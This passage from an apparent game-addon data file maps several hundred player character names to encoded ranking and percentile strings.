["Gsync"] = "ST:836/99%SB:821/99%SM:1013/99%",
["Cindrius"] = "ST:807/99%LB:753/97%LM:895/96%",
["Honeycomb"] = "LT:805/95%SB:702/99%LM:903/95%",
["Usually"] = "LT:835/97%LB:731/96%LM:902/95%",
["Leathyl"] = "LT:875/98%SB:772/99%SM:975/99%",
["Rovert"] = "ST:881/99%SB:799/99%SM:1016/99%",
["Mimosa"] = "ET:739/90%EB:643/89%EM:686/79%",
["Satansanus"] = "ET:765/94%EB:467/89%RM:244/57%",
["Tadray"] = "LT:837/97%SB:731/99%EM:863/93%",
["Exorcists"] = "LT:802/96%LB:718/96%LM:962/98%",
["Muroka"] = "ST:787/99%SB:711/99%LM:918/95%",
["Teeco"] = "ST:889/99%SB:802/99%LM:971/98%",
["Grumpybride"] = "LT:502/95%EB:696/94%EM:876/93%",
["Hildegardis"] = "ET:790/94%SB:784/99%LM:964/98%",
["Mazzo"] = "LT:832/97%LB:589/96%EM:870/93%",
["Dotwand"] = "LT:519/96%EB:660/90%EM:771/84%",
["Maobe"] = "LT:859/98%LB:742/97%LM:918/96%",
["Rafflegodx"] = "LT:832/97%SB:786/99%SM:1116/99%",
["Artisan"] = "LT:535/96%LB:740/97%LM:780/97%",
["Whodoyavoodo"] = "LT:795/96%SB:674/99%SM:991/99%",
["Silencesheep"] = "LT:796/95%LB:700/95%EM:823/89%",
["Alisi"] = "LT:801/95%SB:777/99%LM:947/97%",
["Steveorckel"] = "LT:844/97%LB:768/98%LM:928/95%",
["Furymonkey"] = "LT:853/98%LB:710/95%",
["Nerdo"] = "LT:789/95%EB:679/93%LM:940/97%",
["Betsyross"] = "ST:741/99%SB:789/99%EM:892/93%",
["Aeolist"] = "LT:854/98%SB:791/99%LM:961/98%",
["Pudzey"] = "LT:584/97%SB:774/99%LM:974/98%",
["Breshwahh"] = "LT:579/97%LB:722/96%EM:888/94%",
["Alleira"] = "ET:761/93%LB:707/95%EM:705/80%",
["Trogdar"] = "LT:795/95%EB:698/93%LM:941/97%",
["Ggamjjik"] = "LT:835/97%LB:711/95%EM:809/87%",
["Healyoaz"] = "LT:823/96%SB:725/99%LM:807/97%",
["Bobalol"] = "LT:800/95%LB:704/95%SM:890/99%",
["Brutalfury"] = "LT:836/97%LB:743/96%LM:912/96%",
["Valfre"] = "LT:798/95%LB:753/98%LM:922/97%",
["Ambrosia"] = "LT:826/97%LB:718/95%LM:921/95%",
["Melaryn"] = "LT:559/97%EB:661/90%EM:883/93%",
["Metacortex"] = "ET:783/94%EB:651/90%EM:722/82%",
["Itzrich"] = "LT:856/98%LB:677/98%EM:837/91%",
["Billymays"] = "ET:797/94%LB:731/95%LM:959/98%",
["Shy"] = "LT:538/96%EB:675/91%LM:894/95%",
["Probono"] = "ET:697/88%LB:742/97%SM:983/99%",
["Wafi"] = "ST:919/99%SB:853/99%SM:1005/99%",
["Sakuura"] = "ET:774/94%EB:558/82%EM:795/89%",
["Jabronie"] = "ET:785/94%LB:710/95%EM:828/92%",
["Valå"] = "ST:789/99%LB:614/97%EM:842/93%",
["Medasin"] = "LT:813/96%EB:698/93%EM:869/92%",
["Temptress"] = "ET:790/94%LB:677/98%SM:905/99%",
["Frysauce"] = "LT:610/98%EB:674/91%SM:977/99%",
["Soulsearch"] = "LT:842/97%SB:777/99%SM:985/99%",
["Kascade"] = "LT:859/98%LB:758/98%EM:900/94%",
["Bubbleturtle"] = "LT:818/96%EB:655/91%EM:863/94%",
["Dunts"] = "LT:836/97%SB:702/99%SM:909/99%",
["Elrís"] = "ET:740/92%EB:709/94%LM:942/97%",
["Saráneth"] = "LT:804/95%LB:723/96%LM:910/97%",
["Yaggi"] = "ST:829/99%LB:722/96%EM:854/92%",
["Karsh"] = "LT:570/97%LB:748/97%EM:888/93%",
["Sativastrain"] = "LT:832/97%SB:701/99%SM:982/99%",
["Lowbur"] = "LT:784/95%EB:634/89%EM:704/81%",
["Myweakknees"] = "LT:510/95%LB:675/98%EM:722/82%",
["Popocorn"] = "LT:807/95%LB:725/96%LM:922/96%",
["Shnackypacky"] = "LT:810/96%LB:747/98%LM:974/98%",
["Joot"] = "LT:845/97%EB:522/92%EM:830/92%",
["Anduin"] = "ET:787/94%LB:731/96%LM:787/97%",
["Dalabengba"] = "ET:773/93%LB:644/98%EM:850/91%",
["Souiukotoda"] = "ST:887/99%LB:772/98%LM:939/96%",
["Sayse"] = "LT:808/95%LB:712/95%LM:904/95%",
["Rheen"] = "LT:824/96%SB:778/99%LM:959/98%",
["Astralis"] = "LT:855/98%SB:811/99%SM:969/99%",
["Niaoshou"] = "LT:799/95%EB:687/94%LM:933/97%",
["Tofuug"] = "ST:865/99%SB:740/99%LM:870/98%",
["Ying"] = "ET:479/94%EB:631/88%EM:824/89%",
["Sabrewûlf"] = "ET:765/92%EB:664/92%SM:985/99%",
["Gugugu"] = "ST:906/99%LB:767/98%LM:968/98%",
["Divina"] = "LT:812/95%LB:749/98%EM:870/94%",
["Belbelly"] = "ST:882/99%SB:794/99%LM:975/98%",
["Daeva"] = "LT:650/98%LB:727/96%EM:881/92%",
["Rahagornorn"] = "ST:778/99%SB:778/99%LM:942/98%",
["Atmit"] = "LT:815/96%LB:729/96%LM:873/98%",
["Bubblerap"] = "LT:796/95%LB:744/97%LM:958/98%",
["Flathan"] = "LT:841/97%LB:623/97%LM:888/95%",
["Dkhunter"] = "LT:765/96%LB:794/98%LM:817/96%",
["Lokios"] = "LT:755/96%SB:811/99%SM:1001/99%",
["Baosers"] = "LT:787/98%LB:790/98%LM:938/95%",
["Sweetness"] = "LT:777/97%SB:845/99%SM:1023/99%",
["Standbyme"] = "RT:527/72%SB:812/99%EM:921/94%",
["Cyzin"] = "LT:743/95%LB:781/98%LM:975/98%",
["Icedog"] = "LT:779/98%LB:743/98%LM:954/97%",
["Forsakenwar"] = "ET:722/92%LB:769/96%EM:820/85%",
["Warriordaddy"] = "ST:803/99%SB:816/99%LM:953/96%",
["Xyi"] = "ET:698/91%LB:782/98%LM:929/95%",
["Coybk"] = "ET:608/81%LB:786/98%LM:945/96%",
["Keys"] = "LT:792/98%LB:780/98%SM:1015/99%",
["Secksi"] = "ST:698/99%LB:779/97%EM:865/89%",
["Guttaa"] = "ET:628/83%LB:773/97%LM:918/95%",
["Otaid"] = "LT:787/98%SB:801/99%SM:998/99%",
["Screecho"] = "LT:747/95%LB:770/97%LM:931/95%",
["Spyguy"] = "ET:712/92%LB:768/97%LM:824/97%",
["Vorpal"] = "ST:705/99%LB:792/98%SM:992/99%",
["Heeroshi"] = "LT:515/97%LB:788/98%LM:904/98%",
["Volcster"] = "LT:525/97%LB:777/97%EM:814/91%",
["Rxm"] = "ST:715/99%LB:779/97%LM:944/96%",
["Bundleofstix"] = "LT:765/97%LB:782/98%SM:948/99%",
["Raxes"] = "ET:735/94%SB:800/99%LM:963/97%",
["Eazy"] = "ST:796/99%SB:778/99%LM:984/98%",
["Dallal"] = "ET:733/94%LB:755/95%LM:948/96%",
["Jocko"] = "ET:317/88%EB:748/94%LM:974/98%",
["Hornyudder"] = "ET:653/85%LB:767/96%EM:877/90%",
["Ebkwtf"] = "RT:541/71%LB:788/98%EM:917/93%",
["Whaabam"] = "LT:755/96%LB:790/98%EM:900/94%",
["Khalrogueo"] = "ST:742/99%SB:763/99%LM:896/98%",
["Rubbers"] = "LT:757/96%LB:790/98%LM:959/97%",
["Spenny"] = "LT:771/97%LB:736/98%SM:1006/99%",
["Thefeds"] = "LT:764/96%SB:812/99%SM:1015/99%",
["Aggravate"] = "ET:708/91%LB:774/97%EM:911/93%",
["Knuckles"] = "LT:650/98%LB:786/98%LM:964/97%",
["Warriormommy"] = "ET:737/94%LB:772/97%EM:895/92%",
["Krumsons"] = "LT:786/98%LB:793/98%EM:932/94%",
["Wobbss"] = "RT:547/72%SB:809/99%LM:964/97%",
["Axe"] = "LT:756/96%LB:747/98%LM:886/98%",
["Snooch"] = "LT:784/98%LB:788/98%SM:1015/99%",
["Goodriddance"] = "LT:768/97%SB:838/99%SM:930/99%",
["Mud"] = "LT:780/98%SB:795/99%LM:993/98%",
["Airth"] = "ET:363/92%LB:771/97%LM:942/97%",
["Satzu"] = "ET:735/93%LB:770/97%LM:950/96%",
["Ecrof"] = "ST:701/99%SB:753/99%LM:982/98%",
["Koulaid"] = "LT:788/98%SB:814/99%LM:903/98%",
["Box"] = "ET:714/92%LB:785/98%LM:954/97%",
["Kenn"] = "LT:760/96%SB:824/99%SM:1032/99%",
["Lumbersnack"] = "RT:346/59%SB:856/99%LM:947/97%",
["Drunkinrage"] = "LT:777/98%LB:781/97%LM:972/98%",
["Riotlol"] = "LT:767/97%LB:795/98%LM:956/97%",
["Notpatient"] = "ET:717/92%EB:736/93%SM:1013/99%",
["Batehbeech"] = "LT:777/98%LB:781/97%LM:957/97%",
["Tetheala"] = "ST:804/99%LB:769/97%LM:812/96%",
["Sapadilla"] = "ET:579/78%LB:771/97%SM:1001/99%",
["Andrewyangg"] = "LT:780/98%SB:801/99%SM:1099/99%",
["Youcant"] = "LT:790/98%SB:807/99%SM:1048/99%",
["Smuggles"] = "ST:715/99%SB:799/99%SM:1018/99%",
["Griefous"] = "LT:778/97%LB:787/98%LM:938/95%",
["Tsukuyømi"] = "ET:707/91%LB:780/98%EM:648/89%",
["Discordapp"] = "ET:728/93%LB:787/98%SM:1000/99%",
["Follow"] = "RT:155/57%LB:758/95%EM:874/90%",
["Naoz"] = "SB:825/99%LM:992/98%",
["Swordbreaker"] = "ET:729/93%SB:802/99%LM:912/98%",
["Kittypajamas"] = "LT:791/98%SB:803/99%EM:866/89%",
["Baphomet"] = "LT:647/98%LB:790/98%EM:919/94%",
["Dorkslayer"] = "ET:569/75%SB:811/99%LM:983/98%",
["Reynne"] = "ET:644/85%LB:766/96%EM:769/83%",
["Polleo"] = "ET:736/93%LB:783/98%LM:959/97%",
["Shady"] = "LT:786/98%LB:788/98%EM:883/91%",
["Rogbastards"] = "LT:788/98%SB:800/99%EM:895/92%",
["Stpeachsub"] = "ET:578/78%LB:782/98%LM:928/95%",
["Kyrio"] = "LT:761/96%SB:827/99%SM:1012/99%",
["Pikahboo"] = "ST:781/99%SB:805/99%SM:1036/99%",
["Valden"] = "LT:514/97%LB:649/95%EM:851/88%",
["Carrot"] = "LT:771/97%LB:778/97%LM:984/98%",
["Ricoshae"] = "ST:695/99%LB:790/98%LM:977/98%",
["Gråpe"] = "ET:651/80%LB:629/97%EM:895/93%",
["Majaki"] = "LT:816/96%LB:741/96%EM:905/94%",
["Paparodi"] = "ET:743/91%LB:755/98%LM:890/95%",
["Zaenia"] = "LT:844/97%LB:771/98%LM:964/98%",
["Çosmicdust"] = "LT:803/95%LB:712/96%LM:934/97%",
["Saltbucket"] = "LT:851/97%LB:735/96%SM:993/99%",
["Citereh"] = "ET:743/91%LB:732/97%LM:971/98%",
["Yeahmybadlol"] = "LT:872/98%SB:798/99%SM:1004/99%",
["Maochi"] = "ET:785/94%LB:758/98%LM:918/97%",
["Newyorkstrip"] = "ET:729/88%LB:769/98%LM:940/96%",
["Kolobos"] = "LT:505/97%LB:759/98%LM:828/98%",
["Evilqueenies"] = "ET:748/91%LB:751/98%LM:953/98%",
["Syrodor"] = "LT:804/95%LB:741/96%LM:919/95%",
["Jezii"] = "ET:783/94%SB:803/99%SM:996/99%",
["Flik"] = "LT:577/98%LB:736/97%RM:671/74%",
["Garralin"] = "ST:891/99%SB:795/99%SM:1036/99%",
["Greenhealing"] = "LT:623/97%LB:637/97%EM:890/93%",
["Pie"] = "ET:775/93%LB:748/97%SM:985/99%",
["Merkya"] = "LT:848/98%SB:812/99%SM:1045/99%",
["Miladin"] = "ET:336/87%LB:728/97%LM:934/96%",
["Shazik"] = "LT:829/97%LB:736/97%LM:957/98%",
["Restoski"] = "ST:897/99%SB:779/99%SM:891/99%",
["Cruven"] = "ST:658/99%LB:757/98%LM:915/96%",
["Onstar"] = "ET:785/94%LB:735/97%EM:832/90%",
["Minty"] = "ET:707/87%LB:713/95%LM:884/95%",
["Branden"] = "ET:678/86%LB:720/96%LM:898/95%",
["Kozhevnikov"] = "LT:829/97%SB:815/99%SM:899/99%",
["Darnath"] = "ET:764/91%LB:759/97%EM:613/90%",
["Goldendoodle"] = "ET:767/92%LB:771/98%LM:935/96%",
["Epicjuan"] = "LT:813/96%SB:779/99%SM:992/99%",
["Kielb"] = "ET:467/94%LB:751/97%EM:880/94%",
["Badasbav"] = "ST:769/99%SB:794/99%LM:937/96%",
["Dogwhat"] = "LT:649/98%LB:739/96%EM:768/87%",
["Apoloshaman"] = "LT:516/95%LB:693/98%LM:754/95%",
["Robax"] = "LT:589/97%LB:643/98%LM:945/98%",
["Bergerac"] = "ET:778/94%LB:753/98%EM:803/86%",
["Calang"] = "ET:785/94%LB:716/96%EM:881/93%",
["Ometh"] = "LT:461/95%LB:710/95%LM:928/96%",
["Fadalo"] = "ST:895/99%EB:669/91%LM:933/96%",
["Buck"] = "LT:863/98%LB:783/98%LM:950/97%",
["Caelandine"] = "ST:905/99%SB:821/99%SM:1024/99%",
["Littlecheeks"] = "ST:868/99%SB:764/99%LM:976/98%",
["Shiftphi"] = "LB:733/97%LM:889/95%",
["Gilgameshuwu"] = "LT:537/97%LB:763/98%LM:956/98%",
["Ensure"] = "ST:890/99%SB:806/99%LM:948/98%",
["Eft"] = "ET:710/88%SB:764/99%LM:918/95%",
["Bellette"] = "ET:637/79%LB:738/96%LM:851/98%",
["Theorykraft"] = "LT:469/95%LB:717/95%EM:779/87%",
["Vuna"] = "ST:848/99%SB:751/99%LM:824/97%",
["Dawnce"] = "ET:785/94%LB:697/95%RM:663/73%",
["Sickchain"] = "ET:746/90%LB:775/98%LM:923/95%",
["Marlene"] = "LT:538/97%LB:588/96%LM:900/95%",
["Grabbyhandz"] = "ET:757/92%LB:732/97%LM:912/97%",
["Gongon"] = "LT:827/96%LB:749/97%SM:971/99%",
["Onepriest"] = "ET:680/84%EB:695/94%EM:873/94%",
["Girthyafghan"] = "LT:644/98%LB:623/96%LM:961/98%",
["Napalm"] = "LT:828/97%LB:769/98%LM:960/98%",
["Katreyasaunt"] = "ET:685/85%SB:776/99%EM:879/93%",
["Wyne"] = "ET:780/93%LB:680/98%SM:907/99%",
["Asclepius"] = "LT:678/98%EB:661/91%EM:891/94%",
["Soonsiri"] = "ET:316/83%LB:592/97%LM:953/98%",
["Babybackrib"] = "ET:404/91%SB:699/99%EM:883/92%",
["Athene"] = "SB:879/99%SM:1031/99%",
["Airbnb"] = "ET:726/89%LB:738/97%EM:819/88%",
["Xms"] = "LT:825/96%LB:759/97%EM:699/94%",
["Siolah"] = "RT:585/74%LB:582/96%EM:498/83%",
["Irishman"] = "ET:774/93%LB:759/98%LM:820/97%",
["Mercuri"] = "ET:422/91%LB:741/97%LM:941/97%",
["Babyhawk"] = "ET:743/90%EB:673/92%EM:508/84%",
["Apollex"] = "ET:740/90%LB:726/97%LM:917/95%",
["Jenesis"] = "ST:890/99%LB:758/98%LM:913/95%",
["Wafflexoxo"] = "LT:516/96%LB:716/96%EM:889/94%",
["Illitharia"] = "ET:342/88%LB:728/96%LM:940/97%",
["Elesia"] = "LT:802/95%LB:751/98%LM:914/96%",
["Rascalx"] = "LT:825/96%LB:749/98%EM:854/93%",
["Brotems"] = "LT:852/97%LB:761/97%LM:937/97%",
["Lutan"] = "ET:646/84%LB:724/96%RM:601/71%",
["Letme"] = "LT:853/97%LB:774/98%LM:924/95%",
["Zivylin"] = "LT:862/98%SB:789/99%SM:1016/99%",
["Dadkhah"] = "LT:819/96%SB:759/99%LM:861/98%",
["Killscore"] = "LT:776/98%SB:798/99%LM:920/95%",
["Oldishtomato"] = "LT:774/98%EB:743/94%EM:778/84%",
["Thefridge"] = "LT:769/97%LB:763/96%EM:910/94%",
["Six"] = "LT:791/98%LB:795/98%LM:991/98%",
["Frantically"] = "LT:746/95%EB:737/93%EM:859/89%",
["Glazed"] = "ST:815/99%SB:785/99%EM:785/83%",
["Entul"] = "LT:754/96%LB:797/98%EM:932/93%",
["Kortey"] = "ST:797/99%LB:787/98%LM:979/98%",
["Fatdam"] = "ST:806/99%LB:783/98%LM:993/98%",
["Arya"] = "ST:829/99%SB:838/99%SM:1017/99%",
["Drowskijo"] = "LT:762/96%LB:765/96%EM:825/91%",
["Chargizard"] = "LT:746/95%SB:850/99%SM:1053/99%",
["Sneeker"] = "LT:793/98%SB:797/99%SM:1016/99%",
["Arthqt"] = "LT:767/97%SB:822/99%LM:982/98%",
["Bendriller"] = "LT:793/98%SB:799/99%EM:880/90%",
["Barnacleboy"] = "ST:841/99%SB:819/99%SM:1010/99%",
["Lolipopp"] = "ST:808/99%SB:821/99%SM:1058/99%",
["Eugie"] = "ST:838/99%SB:833/99%SM:1104/99%",
["Diccbiter"] = "LT:773/98%LB:784/98%SM:994/99%",
["Answer"] = "ST:797/99%SB:825/99%LM:972/98%",
["Padraic"] = "LT:763/97%LB:781/97%LM:941/96%",
["Maverikk"] = "LT:748/95%LB:785/98%LM:959/97%",
["Horfromthbak"] = "LT:781/98%LB:763/96%LM:959/97%",
["Straitballin"] = "ST:839/99%SB:811/99%SM:1045/99%",
["Moonstone"] = "LT:791/98%SB:843/99%LM:978/98%",
["Gunmoolzoo"] = "LT:757/96%LB:781/98%EM:881/92%",
["Wrekt"] = "LT:743/95%LB:760/96%EM:500/82%",
["Navarone"] = "LT:791/98%LB:742/96%EM:919/94%",
["Cogz"] = "LT:766/97%LB:639/95%EM:854/90%",
["Wrazz"] = "ST:810/99%SB:791/99%LM:990/98%",
["Fleepflammer"] = "ST:818/99%LB:787/98%LM:956/97%",
["Bearrorist"] = "LT:762/96%LB:663/96%EM:899/92%",
["Der"] = "ST:824/99%SB:823/99%SM:1026/99%",
["Flarewar"] = "LT:751/95%LB:729/98%EM:842/87%",
["Ïcarium"] = "ST:824/99%LB:775/97%SM:1005/99%",
["Sickment"] = "LT:780/98%LB:755/95%LM:955/96%",
["Snewp"] = "ST:803/99%LB:728/95%EM:774/87%",
["Azitur"] = "LT:773/97%LB:762/97%LM:928/96%",
["Amasonikov"] = "ST:825/99%SB:806/99%SM:1070/99%",
["Pog"] = "LT:780/98%LB:765/96%LM:982/98%",
["Freerunner"] = "LT:781/98%LB:776/97%EM:932/94%",
["Hypothermia"] = "LT:782/98%SB:802/99%SM:1042/99%",
["Zooey"] = "ST:678/99%LB:779/97%LM:942/95%",
["Krombopulus"] = "LT:642/98%LB:649/95%EM:940/94%",
["Pvpro"] = "ST:815/99%SB:803/99%SM:1000/99%",
["Rup"] = "LT:579/98%EB:708/90%EM:900/92%",
["Vudumage"] = "ST:797/99%SB:849/99%SM:1090/99%",
["Tupak"] = "ST:792/99%SB:791/99%SM:1086/99%",
["Ryko"] = "ST:808/99%SB:838/99%SM:999/99%",
["Gluten"] = "ST:817/99%SB:793/99%LM:971/97%",
["Larios"] = "LT:760/96%LB:753/95%EM:869/91%",
["Tinysquishy"] = "ST:807/99%LB:777/97%LM:967/97%",
["Vandòóm"] = "LT:782/98%SB:825/99%SM:1034/99%",
["Retar"] = "LT:757/96%LB:768/97%LM:953/98%",
["Healslol"] = "LT:765/97%LB:731/98%LM:937/95%",
["Swanjohn"] = "ST:814/99%SB:832/99%LM:967/97%",
["Poliwag"] = "LT:767/97%LB:769/97%EM:919/94%",
["Bigmage"] = "ST:842/99%SB:791/99%SM:1037/99%",
["Roses"] = "LT:561/98%LB:656/96%EM:822/88%",
["Págani"] = "LT:760/96%LB:772/97%LM:950/96%",
["Justtank"] = "LT:776/98%LB:786/98%EM:899/92%",
["Kota"] = "ST:795/99%SB:838/99%SM:1059/99%",
["Prosequence"] = "LT:763/96%LB:639/95%EM:830/86%",
["Slayeryomi"] = "LT:775/97%LB:778/97%LM:969/98%",
["Persynapse"] = "ST:807/99%SB:809/99%SM:1017/99%",
["Scumcat"] = "LT:781/98%LB:725/98%SM:994/99%",
["Drawnout"] = "LT:790/98%SB:818/99%LM:980/98%",
["Otorotuna"] = "LT:827/96%LB:710/95%LM:908/95%",
["Maleena"] = "ST:728/99%LB:739/97%LM:944/97%",
["Lannka"] = "LT:849/98%LB:765/98%EM:879/93%",
["Silverhand"] = "ST:892/99%LB:743/97%LM:946/98%",
["Spooknscoot"] = "LT:803/95%EB:660/91%EM:670/93%",
["Maximumpaly"] = "LT:840/97%SB:786/99%EM:866/91%",
["Meido"] = "LT:651/98%LB:743/96%EM:860/90%",
["Horpriest"] = "LT:823/96%LB:730/96%LM:917/96%",
["Koltrain"] = "LT:686/98%LB:755/97%LM:956/97%",
["Dyrubs"] = "ET:790/94%LB:732/97%SM:991/99%",
["Suoerdea"] = "ET:773/94%LB:552/95%RM:603/67%",
["Holylite"] = "ET:713/88%EB:669/91%EM:825/89%",
["Duelist"] = "LT:814/96%EB:663/91%EM:895/94%",
["Tuthpick"] = "LT:876/98%LB:731/96%LM:794/97%",
["Tsukihikari"] = "LT:831/97%SB:795/99%SM:991/99%",
["Jeza"] = "ST:784/99%LB:567/95%LM:827/98%",
["Doctonka"] = "LT:824/96%LB:736/97%SM:990/99%",
["Zanith"] = "ET:787/94%EB:689/94%EM:865/92%",
["Pumbah"] = "LT:877/98%LB:732/95%LM:916/96%",
["Hughugestleg"] = "LT:830/97%EB:652/90%EM:758/86%",
["Daijoubloot"] = "ET:732/90%EB:620/85%EM:895/94%",
["Hilgya"] = "LT:802/95%SB:716/99%LM:718/95%",
["Paulspencer"] = "ET:735/90%EB:698/93%EM:832/89%",
["Tiredangel"] = "LT:801/95%LB:718/96%LM:774/96%",
["Cantsee"] = "LT:813/96%LB:739/97%EM:763/83%",
["Jayys"] = "LT:511/95%LB:743/97%RM:670/74%",
["Vorici"] = "ET:731/89%EB:605/85%EM:755/82%",
["Kelisium"] = "ET:365/87%LB:721/96%LM:965/98%",
["Nods"] = "ET:788/94%SB:785/99%SM:979/99%",
["Gripwaald"] = "LT:835/97%SB:800/99%SM:983/99%",
["Hoose"] = "LT:820/96%SB:809/99%SM:1027/99%",
["Rekno"] = "LT:848/97%EB:701/94%EM:872/93%",
["Kroko"] = "LT:812/95%LB:769/98%SM:886/99%",
["Zardo"] = "LT:839/97%LB:724/96%EM:804/86%",
["Nesbitt"] = "LT:839/97%LB:606/97%EM:881/93%",
["Stuffy"] = "ST:872/99%SB:746/99%LM:819/97%",
["Lctricbgaloo"] = "LT:844/97%LB:763/98%LM:962/98%",
["Doligrian"] = "ST:807/99%SB:771/99%EM:906/94%",
["Xz"] = "LT:807/95%SB:776/99%LM:934/97%",
["Byzrk"] = "LT:829/96%LB:733/97%LM:932/97%",
["Draghuk"] = "LT:875/98%LB:766/98%EM:877/92%",
["Roichrothach"] = "LT:840/97%EB:695/94%EM:901/94%",
["Sanans"] = "ET:769/93%LB:739/97%LM:897/95%",
["Wsj"] = "LT:806/95%EB:556/94%EM:808/87%",
["Ðesolator"] = "LT:869/98%LB:752/97%SM:1002/99%",
["Fearrs"] = "ET:757/92%LB:676/98%LM:954/98%",
["Sheol"] = "ET:770/93%LB:738/97%SM:1012/99%",
["Truenoob"] = "ET:726/89%EB:630/88%RM:522/61%",
["Disc"] = "ET:714/88%LB:729/96%SM:1036/99%",
["Titobandito"] = "LT:634/98%LB:760/98%LM:946/97%",
["Stormstrider"] = "ET:780/93%EB:716/94%EM:862/90%",
["Lastsummer"] = "ET:741/90%LB:658/98%LM:889/95%",
["Kylowen"] = "LT:801/95%LB:653/98%EM:891/93%",
["Pheryxia"] = "ET:702/87%EB:703/94%EM:766/84%",
["Laced"] = "ST:897/99%SB:785/99%LM:974/98%",
["Dianthus"] = "LT:827/97%LB:730/96%EM:867/93%",
["Greenbengal"] = "LT:605/97%SB:688/99%EM:819/88%",
["Reylou"] = "ET:786/94%LB:757/98%LM:955/98%",
["Ashypally"] = "LT:802/95%EB:708/94%EM:875/92%",
["Uncletaco"] = "ET:722/89%LB:647/98%LM:862/98%",
["Sabreo"] = "ET:793/94%LB:596/96%LM:904/95%",
["Noodless"] = "ET:742/90%LB:702/95%EM:526/85%",
["Mahana"] = "ET:754/91%EB:683/93%LM:910/95%",
["Abbyq"] = "ET:773/93%LB:721/96%EM:810/88%",
["Lebronny"] = "LT:827/96%SB:817/99%LM:962/98%",
["Superdweef"] = "ET:660/86%SB:845/99%LM:991/98%",
["Pumpupthejam"] = "LT:790/98%SB:799/99%SM:1000/99%",
["Haytme"] = "LT:778/97%LB:776/97%LM:950/97%",
["Twinkeytoes"] = "ET:735/94%LB:773/97%SM:1031/99%",
["Kefla"] = "ET:746/94%LB:781/98%SM:986/99%",
["Boneszaw"] = "LT:777/97%LB:775/97%LM:969/97%",
["Dizang"] = "LT:651/98%SB:777/99%SM:1023/99%",
["Chillgreens"] = "ST:695/99%EB:739/93%EM:784/91%",
["Pepegga"] = "LT:531/97%LB:779/97%LM:937/95%",
["Oursong"] = "ST:671/99%LB:761/96%LM:774/95%",
["Uglydoofus"] = "LT:775/97%LB:766/96%LM:975/98%",
["Trixlol"] = "RT:418/57%LB:774/97%EM:820/87%",
["Vargoose"] = "LT:640/98%LB:792/98%SM:1009/99%",
["Greydagger"] = "LT:752/95%LB:787/98%EM:910/93%",
["Kelrist"] = "LT:777/97%SB:794/99%LM:945/96%",
["Kånye"] = "LT:583/97%LB:784/98%EM:930/94%",
["Lillia"] = "ET:679/88%EB:743/94%EM:831/86%",
["Bjbj"] = "LT:759/96%LB:789/98%LM:952/96%",
["Diqqle"] = "ET:742/94%LB:779/98%LM:836/96%",
["Frankidoodle"] = "LT:755/96%LB:763/96%EM:857/88%",
["Rogueprio"] = "ET:732/93%LB:732/98%LM:961/98%",
["Isma"] = "LT:757/96%LB:774/97%LM:982/98%",
["Slanderer"] = "LT:771/97%SB:793/99%LM:942/95%",
["Nieyan"] = "ET:679/87%SB:771/99%EM:904/92%",
["Sneakykarn"] = "LT:759/96%LB:786/98%LM:970/97%",
["Roshambo"] = "LT:760/96%SB:830/99%LM:924/95%",
["Chillman"] = "ST:805/99%SB:770/99%LM:958/97%",
["Battousai"] = "RT:414/57%LB:776/97%LM:944/96%",
["Qwerty"] = "LT:783/98%SB:780/99%LM:963/97%",
["Shinobu"] = "LT:758/96%LB:778/97%LM:954/96%",
["Pappy"] = "SB:853/99%SM:1040/99%",
["Slygurl"] = "LT:770/97%LB:782/98%SM:1068/99%",
["Cyllez"] = "ST:839/99%SB:917/99%SM:1082/99%",
["Bonerific"] = "LT:759/96%LB:785/98%LM:947/96%",
["Newfie"] = "ET:697/90%LB:758/95%EM:895/92%",
["Thantis"] = "LT:752/95%LB:734/98%LM:945/96%",
["Wolfy"] = "LT:773/97%LB:773/97%LM:965/97%",
["Mesozoic"] = "LT:777/97%LB:768/96%LM:957/96%",
["Dwagon"] = "UT:347/48%EB:743/94%RM:539/61%",
["Ddfruit"] = "LT:773/97%LB:792/98%LM:968/97%",
["Swaga"] = "ET:592/79%LB:759/95%EM:829/91%",
["Slammerex"] = "ET:665/87%LB:777/97%EM:918/94%",
["Berryzncream"] = "ET:632/83%LB:777/97%EM:876/90%",
["Streetgodx"] = "ET:616/83%SB:836/99%SM:1055/99%",
["Wuhanslam"] = "LT:746/95%LB:767/96%EM:767/83%",
["Mavx"] = "LT:775/97%LB:773/97%LM:927/96%",
["Kannibalkow"] = "ET:695/90%SB:822/99%SM:1031/99%",
["Ameliaa"] = "ET:740/94%LB:794/98%LM:959/98%",
["Tankstarz"] = "ET:714/92%LB:649/95%LM:934/95%",
["Vingaddams"] = "ET:731/93%LB:766/96%EM:868/89%",
["Crakked"] = "LT:752/95%LB:762/96%EM:867/91%",
["Slashanddash"] = "LT:754/95%LB:784/98%LM:972/98%",
["Thetallkid"] = "ET:714/91%LB:763/96%EM:904/92%",
["Peni"] = "LT:761/96%SB:782/99%LM:971/98%",
["Xenic"] = "LT:434/96%LB:771/96%LM:957/97%",
["Truett"] = "LT:772/97%SB:770/99%LM:977/98%",
["Clegane"] = "ST:772/99%SB:749/99%LM:810/96%",
["Colz"] = "LT:769/98%LB:772/97%EM:837/91%",
["Shivvyx"] = "LT:761/96%SB:806/99%LM:985/98%",
["Bobthebuildr"] = "ET:559/83%LB:758/95%LM:947/96%",
["Chillmanplus"] = "ST:849/99%LB:741/98%LM:971/98%",
["Edinburgh"] = "ST:806/99%SB:849/99%LM:941/95%",
["Mcboatyface"] = "LT:788/98%SB:796/99%SM:971/99%",
["Axeiom"] = "ET:714/94%SB:852/99%SM:995/99%",
["Enzi"] = "ST:866/99%SB:889/99%SM:1117/99%",
["Daelaam"] = "ET:720/92%LB:775/97%EM:760/80%",
["Omnicide"] = "LT:755/96%LB:739/98%EM:878/90%",
["Twidget"] = "LT:757/96%LB:733/98%EM:924/94%",
["Killburn"] = "LT:756/96%LB:713/98%LM:953/96%",
["Kurasaki"] = "LT:769/97%LB:761/96%EM:826/88%",
["Candree"] = "LT:786/98%SB:785/99%EM:922/94%",
["Stabbydaclwn"] = "ET:728/93%SB:795/99%LM:945/96%",
["Foliage"] = "LT:753/95%SB:800/99%LM:966/97%",
["Alaxell"] = "LT:749/95%LB:781/98%EM:780/82%",
["Ezuarr"] = "LT:761/96%LB:783/98%EM:888/93%",
["Tinytooth"] = "LT:880/98%SB:822/99%LM:945/98%",
["Valinar"] = "LT:861/98%SB:808/99%SM:999/99%",
["Suugs"] = "ST:708/99%SB:743/99%LM:938/97%",
["Arilya"] = "LB:723/96%EM:757/83%",
["Mazmarize"] = "LT:617/98%LB:762/98%LM:921/95%",
["Gyomei"] = "ST:861/99%SB:719/99%SM:938/99%",
["Supakamiguru"] = "RT:219/66%LB:732/97%LM:942/97%",
["Machoboracho"] = "ET:461/93%LB:709/95%EM:698/77%",
